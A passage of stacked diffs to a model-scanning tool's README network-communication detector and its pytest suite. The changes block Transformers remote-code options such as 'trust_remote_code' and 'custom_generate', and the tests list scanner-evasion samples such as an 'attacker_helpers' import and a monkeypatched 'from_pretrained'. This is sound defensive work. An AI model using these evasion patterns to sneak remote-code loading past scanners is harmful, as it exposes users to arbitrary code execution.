                     binding_chain is not None
                     and tuple(id(binding_node) for binding_node, _binding_value in candidates) == binding_chain
-                    and name_writes_match_binding_chain(relevant_name_writes.get(name, []), binding_chain)
+                    and name_writes_match_binding_chain(logical_write_nodes, binding_chain)
                 ):
                     logical_candidates = [candidates[-1]]
                     logical_write_count = 1
@@ -3012,7 +3065,10 @@ def _is_valid_official_readme_sample_image_example(
             ]
             relevant_binding_counts[name] = logical_write_count
         for name, write_nodes in relevant_name_writes.items():
-            relevant_binding_counts.setdefault(name, len(write_nodes))
+            relevant_binding_counts.setdefault(
+                name,
+                sum(id(write_node) not in proven_safe_mapping_augassign_target_ids for write_node in write_nodes),
+            )
 
         def proven_mapping_operand_ids_for(mapping_value: ast.expr) -> frozenset[int]:
             remaining_steps = _MAX_README_IMAGE_EXAMPLE_AST_NODES
@@ -3182,7 +3238,7 @@ def _is_valid_official_readme_sample_image_example(
             if not isinstance(device_value, ast.Constant) or not isinstance(device_value.value, str):
                 return False
             device = device_value.value
-            if device not in {"cpu", "cuda", "mps"} and not (
+            if device not in {"cpu", "cuda", "hpu", "mps", "npu", "xpu"} and not (
                 device.startswith("cuda:") and device.removeprefix("cuda:").isdecimal()
             ):
                 return False

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -2031,6 +2031,10 @@ def _matching_readme_image_fence_end(
     return None
 
 
+# Transformers keywords that cause Hub-hosted Python to be fetched and executed.
+_REMOTE_CODE_KEYWORDS = frozenset({"custom_generate", "trust_remote_code"})
+
+
 def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
     if b"import requests" not in example or b"requests.get" not in example:
         return False
@@ -2251,11 +2255,33 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         if isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
             if node not in requests_calls and node.func.attr not in documented_attribute_calls:
                 return False
-            if node.func.attr == "from_pretrained" and any(
-                keyword.arg is None
-                or (
+            # `trust_remote_code` and `custom_generate` both cause Transformers to fetch and execute
+            # Hub-hosted Python, and neither is exclusive to `from_pretrained`: since Transformers
+            # 4.55 `generate(custom_generate=..., trust_remote_code=True)` does it too, and
+            # `generate` is a documented call. Gate them on every call, not just `from_pretrained`.
+            if any(
+                (
                     keyword.arg == "trust_remote_code"
                     and (not isinstance(keyword.value, ast.Constant) or keyword.value.value is not False)
+                )
+                or keyword.arg == "custom_generate"
+                for keyword in node.keywords
+            ):
+                return False
+            # `**kwargs` hides the arguments above from inspection. Reject it outright only on
+            # `from_pretrained`; documented cards legitimately write `model.generate(**inputs)`, so
+            # for every other call reject just the literal-dict form that names a remote-code flag.
+            if any(
+                keyword.arg is None
+                and (
+                    node.func.attr == "from_pretrained"
+                    or (
+                        isinstance(keyword.value, ast.Dict)
+                        and any(
+                            isinstance(key, ast.Constant) and key.value in _REMOTE_CODE_KEYWORDS
+                            for key in keyword.value.keys
+                        )
+                    )
                 )
                 for keyword in node.keywords
             ):

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -2888,6 +2888,7 @@ def _is_valid_official_readme_sample_image_example(
 
     proven_safe_mapping_augassign_ids: set[int] = set()
     proven_safe_mapping_augassign_target_ids: set[int] = set()
+    proven_identity_preserving_mapping_transfer_target_ids: set[int] = set()
     for node in nodes:
         if (
             not isinstance(node, ast.AugAssign)
@@ -2907,6 +2908,13 @@ def _is_valid_official_readme_sample_image_example(
             continue
         proven_safe_mapping_augassign_ids.add(id(node))
         proven_safe_mapping_augassign_target_ids.add(id(node.target))
+
+    def mapping_write_preserves_alias_identity(write_node: ast.AST) -> bool:
+        write_id = id(write_node)
+        return (
+            write_id in proven_safe_mapping_augassign_target_ids
+            or write_id in proven_identity_preserving_mapping_transfer_target_ids
+        )
 
     mapping_alias_targets = {
         id(binding_node): frozenset(target_names) for binding_node, target_names, _source_name in mapping_alias_groups
@@ -2941,7 +2949,7 @@ def _is_valid_official_readme_sample_image_example(
             for write_node in name_write_nodes.get(current_name, []):
                 if node_is_within(write_node, reference) or node_is_within(write_node, binding_node):
                     continue
-                if id(write_node) in proven_safe_mapping_augassign_target_ids:
+                if mapping_write_preserves_alias_identity(write_node):
                     continue
                 if (
                     operation_definitely_follows_reference(
@@ -2965,7 +2973,7 @@ def _is_valid_official_readme_sample_image_example(
             for write_node in name_write_nodes.get(endpoint_name, []):
                 if node_is_within(write_node, binding_node):
                     continue
-                if id(write_node) in proven_safe_mapping_augassign_target_ids:
+                if mapping_write_preserves_alias_identity(write_node):
                     continue
                 if reference_is_post_binding and node_is_within(write_node, reference):
                     return None
@@ -2999,7 +3007,7 @@ def _is_valid_official_readme_sample_image_example(
             for write_node in name_write_nodes.get(endpoint_name, []):
                 if node_is_within(write_node, binding_node):
                     continue
-                if id(write_node) in proven_safe_mapping_augassign_target_ids:
+                if mapping_write_preserves_alias_identity(write_node):
                     continue
                 if (
                     operation_definitely_follows_reference(
@@ -3786,6 +3794,7 @@ def _is_valid_official_readme_sample_image_example(
             proven_transformers_instance_binding_chains[id(binding_node)] = instance_chain
 
         binding_chain: tuple[int, ...] | None = None
+        identity_preserving_same_name_transfer = False
         if trusted_mapping_factory_call_is_proven_safe(binding_node, mapping_value):
             binding_chain = (id(binding_node),)
         else:
@@ -3796,6 +3805,7 @@ def _is_valid_official_readme_sample_image_example(
                 transfer_calls,
                 proven_mapping_binding_chains,
             )
+            identity_preserving_same_name_transfer = binding_chain is not None
             if binding_chain is None:
                 binding_chain = renamed_mapping_transfer_binding_chain(
                     binding_node,
@@ -3805,6 +3815,21 @@ def _is_valid_official_readme_sample_image_example(
                 )
         if binding_chain is None:
             continue
+        if identity_preserving_same_name_transfer:
+            if isinstance(binding_node, ast.Assign):
+                identity_target = binding_node.targets[0]
+            elif isinstance(binding_node, ast.AnnAssign):
+                identity_target = binding_node.target
+            else:
+                return False
+            if not isinstance(identity_target, ast.Name) or identity_target.id != binding_name:
+                return False
+            # BatchEncoding.to returns self, so this proven assignment preserves every live alias edge.
+            proven_identity_preserving_mapping_transfer_target_ids.add(id(identity_target))
+            refreshed_mapping_aliases = expand_mapping_alias_groups(mapping_alias_groups)
+            if refreshed_mapping_aliases is None:
+                return False
+            mapping_aliases[:] = refreshed_mapping_aliases
         proven_mapping_binding_chains[id(binding_node)] = binding_chain
         proven_mapping_call_id_set.add(id(binding_value))
         proven_mapping_transfer_call_id_set.update(id(transfer_call) for transfer_call in transfer_calls)

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -2500,16 +2500,24 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         binding_node: ast.AST,
         allowed_factory_names: set[str],
     ) -> bool:
+        def operation_may_affect_reference(operation: ast.AST) -> bool:
+            if isinstance(binding_node, ast.Call):
+                if call_execution_may_be_deferred(binding_node):
+                    return True
+                operation_index = top_level_statement_indices.get(id(operation))
+                reference_index = top_level_statement_indices.get(id(binding_node))
+                return operation_index is None or reference_index is None or operation_index <= reference_index
+            return top_level_statement_precedes(operation, binding_node)
+
         instance_bindings = [
             (instance_binding, factory_call)
             for instance_binding, factory_call in mapping_bindings.get(instance_name, [])
-            if top_level_statement_precedes(instance_binding, binding_node)
+            if operation_may_affect_reference(instance_binding)
         ]
-        prior_write_count = sum(
-            top_level_statement_precedes(write_node, binding_node)
-            for write_node in name_write_nodes.get(instance_name, [])
+        relevant_write_count = sum(
+            operation_may_affect_reference(write_node) for write_node in name_write_nodes.get(instance_name, [])
         )
-        if len(instance_bindings) != 1 or prior_write_count != 1:
+        if len(instance_bindings) != 1 or relevant_write_count != 1:
             return False
         instance_binding, factory_call = instance_bindings[0]
         return (
@@ -2643,6 +2651,27 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         proven_mapping_binding_chains[id(binding_node)] = binding_chain
         proven_mapping_call_id_set.add(id(binding_value))
         proven_mapping_transfer_call_id_set.update(id(transfer_call) for transfer_call in transfer_calls)
+
+    for generate_call in nodes:
+        if (
+            not isinstance(generate_call, ast.Call)
+            or not isinstance(generate_call.func, ast.Attribute)
+            or generate_call.func.attr != "generate"
+            or call_execution_may_be_deferred(generate_call)
+        ):
+            continue
+        for keyword in generate_call.keywords:
+            if keyword.arg is not None or not isinstance(keyword.value, ast.Call):
+                continue
+            unwrapped_mapping = unwrap_safe_mapping_device_transfers(keyword.value, generate_call)
+            if unwrapped_mapping is None:
+                continue
+            mapping_value, transfer_calls = unwrapped_mapping
+            if not trusted_mapping_factory_call_is_proven_safe(generate_call, mapping_value):
+                continue
+            proven_mapping_call_id_set.add(id(keyword.value))
+            proven_mapping_transfer_call_id_set.update(id(transfer_call) for transfer_call in transfer_calls)
+
     proven_mapping_call_ids = frozenset(proven_mapping_call_id_set)
     proven_mapping_transfer_call_ids = frozenset(proven_mapping_transfer_call_id_set)
 

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -11,7 +11,7 @@ import re
 import tokenize
 from bisect import bisect_right
 from collections import Counter
-from collections.abc import Iterator
+from collections.abc import Iterable, Iterator
 from contextlib import suppress
 from functools import lru_cache
 from importlib.resources import files
@@ -2278,8 +2278,10 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
     allowed_targets: set[int] = set()
     mapping_bindings: dict[str, list[tuple[ast.AST, ast.expr]]] = {}
     single_name_bindings: dict[str, list[tuple[ast.AST, ast.expr]]] = {}
+    name_value_bindings: dict[str, list[tuple[ast.AST, ast.expr]]] = {}
+    modeled_name_write_ids: dict[str, set[int]] = {}
     mapping_aliases: list[tuple[ast.AST, str, str]] = []
-    mapping_alias_groups: list[tuple[ast.AST, tuple[str, ...], str]] = []
+    mapping_alias_groups: list[tuple[ast.AST, tuple[str, ...], str | None]] = []
     mapping_alias_target_names: set[str] = set()
     name_write_nodes: dict[str, list[ast.AST]] = {}
     for node in nodes:
@@ -2311,6 +2313,11 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         targets = binding_node.targets if isinstance(binding_node, ast.Assign) else [binding_node.target]
         if binding_node.value is not None and len(targets) == 1 and isinstance(targets[0], ast.Name):
             single_name_bindings.setdefault(targets[0].id, []).append((binding_node, binding_node.value))
+        if binding_node.value is not None:
+            for target in targets:
+                if isinstance(target, ast.Name):
+                    name_value_bindings.setdefault(target.id, []).append((binding_node, binding_node.value))
+                    modeled_name_write_ids.setdefault(target.id, set()).add(id(target))
         if (
             not isinstance(parents.get(id(binding_node)), ast.Module)
             and isinstance(binding_node.value, (ast.Call, ast.Dict))
@@ -2319,12 +2326,15 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         ):
             mapping_bindings.setdefault(targets[0].id, []).append((binding_node, binding_node.value))
         target_names = [target.id for target in targets if isinstance(target, ast.Name)]
-        if target_names and isinstance(binding_node.value, ast.Name):
+        source_name = binding_node.value.id if isinstance(binding_node.value, ast.Name) else None
+        if target_names and (len(target_names) > 1 or source_name is not None):
             mapping_alias_target_names.update(target_names)
-            mapping_alias_groups.append((binding_node, tuple(dict.fromkeys(target_names)), binding_node.value.id))
+            mapping_alias_groups.append((binding_node, tuple(dict.fromkeys(target_names)), source_name))
     for candidates in mapping_bindings.values():
         candidates.sort(key=lambda item: (getattr(item[0], "lineno", 0), getattr(item[0], "col_offset", 0)))
     for candidates in single_name_bindings.values():
+        candidates.sort(key=lambda item: (getattr(item[0], "lineno", 0), getattr(item[0], "col_offset", 0)))
+    for candidates in name_value_bindings.values():
         candidates.sort(key=lambda item: (getattr(item[0], "lineno", 0), getattr(item[0], "col_offset", 0)))
 
     top_level_statement_indices = {
@@ -2512,6 +2522,61 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             current = parents.get(id(current))
         return False
 
+    def node_is_statically_unreachable(node: ast.AST) -> bool:
+        membership = direct_statement_membership(node)
+        if membership is None:
+            return False
+        current_statement = membership[3]
+        while containing_membership := statement_memberships.get(id(current_statement)):
+            container, field_name, _statement_index, _statement = containing_membership
+            if (
+                isinstance(container, ast.If)
+                and isinstance(container.test, ast.Constant)
+                and isinstance(container.test.value, bool)
+                and (
+                    (field_name == "body" and not container.test.value)
+                    or (field_name == "orelse" and container.test.value)
+                )
+            ):
+                return True
+            if not isinstance(container, ast.stmt):
+                return False
+            current_statement = container
+        return False
+
+    def node_is_proven_executed_before(node: ast.AST, reference: ast.AST) -> bool:
+        if node_is_statically_unreachable(node) or not operation_definitely_follows_reference(reference, node):
+            return False
+        node_membership = direct_statement_membership(node)
+        reference_membership = direct_statement_membership(reference)
+        if node_membership is None or reference_membership is None:
+            return False
+        node_statement = node_membership[3]
+        reference_statement = reference_membership[3]
+        if binding_precedes_reference_in_supported_body(node_statement, reference_statement):
+            return True
+        current_statement = node_statement
+        while containing_membership := statement_memberships.get(id(current_statement)):
+            container, field_name, _statement_index, _statement = containing_membership
+            if isinstance(container, ast.Module):
+                return True
+            if isinstance(container, ast.With) and field_name == "body" and is_canonical_no_grad_with(container):
+                current_statement = container
+                continue
+            if (
+                isinstance(container, ast.If)
+                and isinstance(container.test, ast.Constant)
+                and isinstance(container.test.value, bool)
+                and (
+                    (field_name == "body" and container.test.value)
+                    or (field_name == "orelse" and not container.test.value)
+                )
+            ):
+                current_statement = container
+                continue
+            return False
+        return False
+
     mapping_alias_targets = {
         id(binding_node): frozenset(target_names) for binding_node, target_names, _source_name in mapping_alias_groups
     }
@@ -2539,10 +2604,17 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             for write_node in name_write_nodes.get(current_name, []):
                 if node_is_within(write_node, reference) or node_is_within(write_node, binding_node):
                     continue
-                if operation_definitely_follows_reference(
-                    write_node,
-                    reference,
-                ) and operation_definitely_follows_reference(binding_node, write_node):
+                if (
+                    operation_definitely_follows_reference(
+                        write_node,
+                        reference,
+                    )
+                    and operation_definitely_follows_reference(
+                        binding_node,
+                        write_node,
+                    )
+                    and node_is_proven_executed_before(write_node, binding_node)
+                ):
                     return None
             return (
                 alias_name,
@@ -2556,10 +2628,17 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
                     continue
                 if reference_is_post_binding and node_is_within(write_node, reference):
                     return None
-                if operation_definitely_follows_reference(
-                    write_node,
-                    binding_node,
-                ) and operation_definitely_follows_reference(reference, write_node):
+                if (
+                    operation_definitely_follows_reference(
+                        write_node,
+                        binding_node,
+                    )
+                    and operation_definitely_follows_reference(
+                        reference,
+                        write_node,
+                    )
+                    and node_is_proven_executed_before(write_node, reference)
+                ):
                     return None
         return (
             alias_name,
@@ -2579,10 +2658,17 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             for write_node in name_write_nodes.get(endpoint_name, []):
                 if node_is_within(write_node, binding_node):
                     continue
-                if operation_definitely_follows_reference(
-                    write_node,
-                    binding_node,
-                ) and operation_definitely_follows_reference(reference, write_node):
+                if (
+                    operation_definitely_follows_reference(
+                        write_node,
+                        binding_node,
+                    )
+                    and operation_definitely_follows_reference(
+                        reference,
+                        write_node,
+                    )
+                    and node_is_proven_executed_before(write_node, reference)
+                ):
                     return False
         return True
 
@@ -2592,8 +2678,8 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         mapping_alias_groups,
         key=lambda item: (getattr(item[0], "lineno", 0), getattr(item[0], "col_offset", 0)),
     ):
-        source_component = {source_name}
-        pending_source_names = [source_name]
+        source_component = {source_name} if source_name is not None else set()
+        pending_source_names = [source_name] if source_name is not None else []
         while pending_source_names:
             current_name = pending_source_names.pop()
             for prior_binding, first_name, second_name in expanded_mapping_aliases:
@@ -3026,13 +3112,159 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
     proven_mapping_call_ids = frozenset(proven_mapping_call_id_set)
     proven_mapping_transfer_call_ids = frozenset(proven_mapping_transfer_call_id_set)
 
+    sensitive_callable_attributes = frozenset({"from_pretrained", "generate"})
+    benign_callable_marker = "<benign-callable>"
+    untrusted_callable_marker = "<untrusted-callable>"
+    named_callable_resolution_cache: dict[tuple[str, int], frozenset[str] | None] = {}
+
+    def binding_is_proven_after_eager_reference(binding: ast.AST, reference: ast.AST) -> bool:
+        if execution_may_be_deferred(reference):
+            return False
+        binding_position = top_level_statement_indices.get(id(binding))
+        reference_position = top_level_statement_indices.get(id(reference))
+        if binding_position is None or reference_position is None:
+            return False
+        if binding_position != reference_position:
+            return binding_position > reference_position
+        binding_membership = direct_statement_membership(binding)
+        reference_membership = direct_statement_membership(reference)
+        if binding_membership is None or reference_membership is None:
+            return False
+        return binding_precedes_reference_in_supported_body(
+            reference_membership[3],
+            binding_membership[3],
+        )
+
+    def named_sensitive_callable_resolution(
+        name: str,
+        call: ast.Call,
+    ) -> frozenset[str] | None:
+        cache_key = (name, id(call))
+        if cache_key in named_callable_resolution_cache:
+            return named_callable_resolution_cache[cache_key]
+        remaining_steps = _MAX_README_IMAGE_EXAMPLE_AST_NODES
+        memo: dict[tuple[str, int], frozenset[str]] = {}
+        resolving: set[tuple[str, int]] = set()
+
+        def merge_values(
+            values: Iterable[ast.expr],
+            reference: ast.AST,
+        ) -> frozenset[str] | None:
+            merged: set[str] = set()
+            for candidate_value in values:
+                candidate_resolution = resolve_value(candidate_value, reference)
+                if candidate_resolution is None:
+                    return None
+                merged.update(candidate_resolution)
+            return frozenset(merged or {untrusted_callable_marker})
+
+        def resolve_value(
+            value: ast.expr,
+            reference: ast.AST,
+        ) -> frozenset[str] | None:
+            if isinstance(value, ast.Attribute) and value.attr in sensitive_callable_attributes:
+                return frozenset({value.attr})
+            if isinstance(value, ast.Name):
+                return resolve_name(value.id, reference)
+            if isinstance(value, ast.IfExp):
+                if isinstance(value.test, ast.Constant) and isinstance(value.test.value, bool):
+                    return resolve_value(value.body if value.test.value else value.orelse, reference)
+                return merge_values((value.body, value.orelse), reference)
+            if isinstance(value, ast.BoolOp):
+                return merge_values(value.values, reference)
+            if isinstance(value, (ast.List, ast.Set, ast.Tuple)):
+                return merge_values(value.elts, reference)
+            if isinstance(value, ast.Dict):
+                return merge_values(value.values, reference)
+            if isinstance(value, ast.NamedExpr):
+                return resolve_value(value.value, reference)
+            if isinstance(value, ast.Subscript):
+                return resolve_value(value.value, reference)
+            if (
+                isinstance(value, ast.Call)
+                and isinstance(value.func, ast.Attribute)
+                and value.func.attr == "from_pretrained"
+                and isinstance(value.func.value, ast.Name)
+                and value.func.value.id in transformers_mapping_factory_names
+                and call_has_only_proven_safe_mapping_arguments(value)
+            ):
+                return frozenset({benign_callable_marker})
+            return frozenset({untrusted_callable_marker})
+
+        def resolve_name(
+            candidate_name: str,
+            reference: ast.AST,
+        ) -> frozenset[str] | None:
+            nonlocal remaining_steps
+            if candidate_name in documented_builtin_names:
+                return frozenset({benign_callable_marker})
+            key = (candidate_name, id(reference))
+            if key in memo:
+                return memo[key]
+            if key in resolving:
+                return None
+            resolving.add(key)
+            resolution: frozenset[str] | None = None
+            write_events: list[tuple[ast.AST, ast.expr | None]] = [
+                *name_value_bindings.get(candidate_name, []),
+                *(
+                    (write_node, None)
+                    for write_node in name_write_nodes.get(candidate_name, [])
+                    if id(write_node) not in modeled_name_write_ids.get(candidate_name, set())
+                ),
+            ]
+            write_events.sort(
+                key=lambda item: (
+                    top_level_statement_indices.get(id(item[0]), len(tree.body)),
+                    getattr(item[0], "lineno", 0),
+                    getattr(item[0], "col_offset", 0),
+                )
+            )
+            for binding_node, binding_value in write_events:
+                if binding_is_proven_after_eager_reference(
+                    binding_node,
+                    reference,
+                ) or node_is_statically_unreachable(binding_node):
+                    continue
+                if remaining_steps <= 0:
+                    resolving.remove(key)
+                    return None
+                remaining_steps -= 1
+                binding_kinds = (
+                    resolve_value(binding_value, binding_node)
+                    if binding_value is not None
+                    else frozenset({untrusted_callable_marker})
+                )
+                if binding_kinds is None:
+                    resolving.remove(key)
+                    return None
+                if node_is_proven_executed_before(binding_node, reference) or resolution is None:
+                    resolution = binding_kinds
+                else:
+                    resolution = resolution | binding_kinds
+            resolving.remove(key)
+            result = resolution if resolution is not None else frozenset({untrusted_callable_marker})
+            memo[key] = result
+            return result
+
+        result = resolve_name(name, call)
+        named_callable_resolution_cache[cache_key] = result
+        return result
+
     remote_mapping_calls_by_name: dict[str, list[ast.Call]] = {}
     for node in nodes:
-        if (
-            not isinstance(node, ast.Call)
-            or not isinstance(node.func, ast.Attribute)
-            or node.func.attr not in {"from_pretrained", "generate"}
-        ):
+        if not isinstance(node, ast.Call):
+            continue
+        if isinstance(node.func, ast.Attribute):
+            callable_kinds = frozenset({node.func.attr}) & sensitive_callable_attributes
+        elif isinstance(node.func, ast.Name):
+            callable_resolution = named_sensitive_callable_resolution(node.func.id, node)
+            if callable_resolution is None or not callable_resolution <= sensitive_callable_attributes:
+                continue
+            callable_kinds = callable_resolution
+        else:
+            continue
+        if not callable_kinds:
             continue
         for keyword in node.keywords:
             if keyword.arg is None and isinstance(keyword.value, ast.Name):
@@ -3072,6 +3304,29 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             if operation_definitely_follows_reference(target, binding_node)
         ]
         return bool(prior_bindings) and isinstance(prior_bindings[-1], ast.Dict)
+
+    def named_sensitive_call_has_safe_options(call: ast.Call, callable_kinds: frozenset[str]) -> bool:
+        if any(
+            keyword.arg in _REMOTE_CODE_KEYWORDS and not _remote_code_option_is_disabled(keyword.arg, keyword.value)
+            for keyword in call.keywords
+        ):
+            return False
+        if "generate" in callable_kinds and (
+            any(isinstance(argument, ast.Starred) for argument in call.args)
+            or not _generate_positional_remote_code_is_disabled(call.args)
+        ):
+            return False
+        return all(
+            keyword.arg is not None
+            or remote_code_mapping_is_proven_safe_at_call(
+                keyword.value,
+                call,
+                proven_mapping_call_ids=proven_mapping_call_ids,
+                proven_mapping_binding_chains=proven_mapping_binding_chains,
+                proven_mapping_transfer_call_ids=proven_mapping_transfer_call_ids,
+            )
+            for keyword in call.keywords
+        )
 
     for node in nodes:
         if isinstance(node, ast.Import):
@@ -3131,12 +3386,17 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             return False
         if isinstance(node, ast.ExceptHandler) and node.name in protected_names:
             return False
-        if (
-            isinstance(node, ast.Call)
-            and isinstance(node.func, ast.Name)
-            and node.func.id not in callable_assignments | documented_builtin_names
-        ):
-            return False
+        if isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
+            callable_resolution = named_sensitive_callable_resolution(node.func.id, node)
+            if callable_resolution is None or untrusted_callable_marker in callable_resolution:
+                return False
+            callable_kinds = callable_resolution & sensitive_callable_attributes
+            if callable_kinds and benign_callable_marker in callable_resolution:
+                return False
+            if node.func.id not in callable_assignments | documented_builtin_names and not callable_kinds:
+                return False
+            if callable_kinds and not named_sensitive_call_has_safe_options(node, callable_kinds):
+                return False
         if isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
             if node not in requests_calls and node.func.attr not in documented_attribute_calls:
                 return False

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -5476,6 +5476,124 @@ class TestNetworkCommDetector:
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
 
     @pytest.mark.parametrize(
+        "factory_aliases",
+        [
+            "ProcessorClass = AutoProcessor\n",
+            "BaseProcessor = AutoProcessor\nProcessorClass = BaseProcessor\n",
+        ],
+        ids=["direct-alias", "bounded-alias-chain"],
+    )
+    def test_readme_python_example_allows_ordered_transformers_factory_alias(
+        self,
+        factory_aliases: str,
+    ) -> None:
+        """A direct, uniquely prior alias preserves trusted factory provenance."""
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            f"{factory_aliases}"
+            "processor = ProcessorClass.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "inputs = processor(images=image, return_tensors='pt')\n"
+            "model.generate(**inputs)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "factory_setup",
+        [
+            (
+                "ProcessorClass = AutoProcessor\n"
+                "ProcessorClass = AutoModel\n"
+                "processor = ProcessorClass.from_pretrained('official/model')\n"
+            ),
+            (
+                "if True:\n"
+                "    ProcessorClass = AutoProcessor\n"
+                "processor = ProcessorClass.from_pretrained('official/model')\n"
+            ),
+            (
+                "False or (ProcessorClass := AutoProcessor)\n"
+                "processor = ProcessorClass.from_pretrained('official/model')\n"
+            ),
+            (
+                "def select_factory():\n"
+                "    ProcessorClass = AutoProcessor\n"
+                "processor = ProcessorClass.from_pretrained('official/model')\n"
+            ),
+            ("processor = ProcessorClass.from_pretrained('official/model')\nProcessorClass = AutoProcessor\n"),
+            ("ProcessorClass = image\nprocessor = ProcessorClass.from_pretrained('official/model')\n"),
+            (
+                "ProcessorClass = getattr(AutoProcessor, '__class__')\n"
+                "processor = ProcessorClass.from_pretrained('official/model')\n"
+            ),
+            (
+                "from transformers import *\n"
+                "ProcessorClass = AutoProcessor\n"
+                "processor = ProcessorClass.from_pretrained('official/model')\n"
+            ),
+            (
+                "from attacker_helpers import AutoProcessor as ProcessorClass\n"
+                "processor = ProcessorClass.from_pretrained('official/model')\n"
+            ),
+            (
+                "ProcessorClass = AutoProcessor\n"
+                "ProcessorClass.from_pretrained = print\n"
+                "processor = ProcessorClass.from_pretrained('official/model')\n"
+            ),
+            (
+                "ProcessorClass = AutoProcessor\n"
+                "processor = ProcessorClass.from_pretrained('official/model', trust_remote_code=True)\n"
+            ),
+            (
+                "ProcessorClass = OtherClass\n"
+                "OtherClass = ProcessorClass\n"
+                "processor = ProcessorClass.from_pretrained('official/model')\n"
+            ),
+        ],
+        ids=[
+            "rebound-alias",
+            "branch-alias",
+            "short-circuit-alias",
+            "deferred-alias",
+            "use-before-bind",
+            "untrusted-alias",
+            "dynamic-getattr",
+            "wildcard-import",
+            "untrusted-import",
+            "mutated-method",
+            "remote-code-option",
+            "alias-cycle",
+        ],
+    )
+    def test_readme_python_example_rejects_unproven_transformers_factory_alias(
+        self,
+        factory_setup: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            f"{factory_setup}"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "inputs = processor(images=image, return_tensors='pt')\n"
+            "model.generate(**inputs)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
         "inputs_setup",
         [
             ("device = 'cpu'; inputs = processor(images=image, return_tensors='pt').to(device)\n"),
@@ -5483,6 +5601,10 @@ class TestNetworkCommDetector:
             ("inputs = processor(images=image, return_tensors='pt').to('xpu')\n"),
             ("inputs = processor(images=image, return_tensors='pt').to('npu')\n"),
             ("inputs = processor(images=image, return_tensors='pt').to('hpu')\n"),
+            ("inputs = processor(images=image, return_tensors='pt').to('xpu:0')\n"),
+            ("inputs = processor(images=image, return_tensors='pt').to('npu:1')\n"),
+            ("inputs = processor(images=image, return_tensors='pt').to('hpu:2')\n"),
+            ("inputs = processor(images=image, return_tensors='pt').to('mps:3')\n"),
             ("inputs = processor(images=image, return_tensors='pt'); inputs = inputs.to('cpu')\n"),
             (
                 "device = 'cuda' if torch.cuda.is_available() else 'cpu'\n"
@@ -5495,6 +5617,10 @@ class TestNetworkCommDetector:
             "xpu-device",
             "npu-device",
             "hpu-device",
+            "indexed-xpu-device",
+            "indexed-npu-device",
+            "indexed-hpu-device",
+            "indexed-mps-device",
             "mapping-rebind",
             "bounded-conditional-device",
         ],
@@ -5517,6 +5643,218 @@ class TestNetworkCommDetector:
         assert findings
         assert all(finding["severity"] == "INFO" for finding in findings)
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "device",
+        ["cpu:0", "xpu:-1", "npu:one", "hpu:0:1", " mps:0", "cuda:0 ", "remote:0"],
+        ids=[
+            "indexed-cpu",
+            "negative-index",
+            "nonnumeric-index",
+            "multiple-colons",
+            "leading-whitespace",
+            "trailing-whitespace",
+            "unknown-device",
+        ],
+    )
+    def test_readme_python_example_rejects_invalid_indexed_local_device(self, device: str) -> None:
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"inputs = processor(images=image, return_tensors='pt').to({device!r})\n"
+            "model.generate(**inputs)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "generate_statement",
+        [
+            "outputs = model.generate(**inputs)\n",
+            "outputs: object = model.generate(**inputs)\n",
+        ],
+        ids=["assignment", "annotated-assignment"],
+    )
+    def test_readme_python_example_allows_eager_assigned_generate_in_no_grad(
+        self,
+        generate_statement: str,
+    ) -> None:
+        data = (
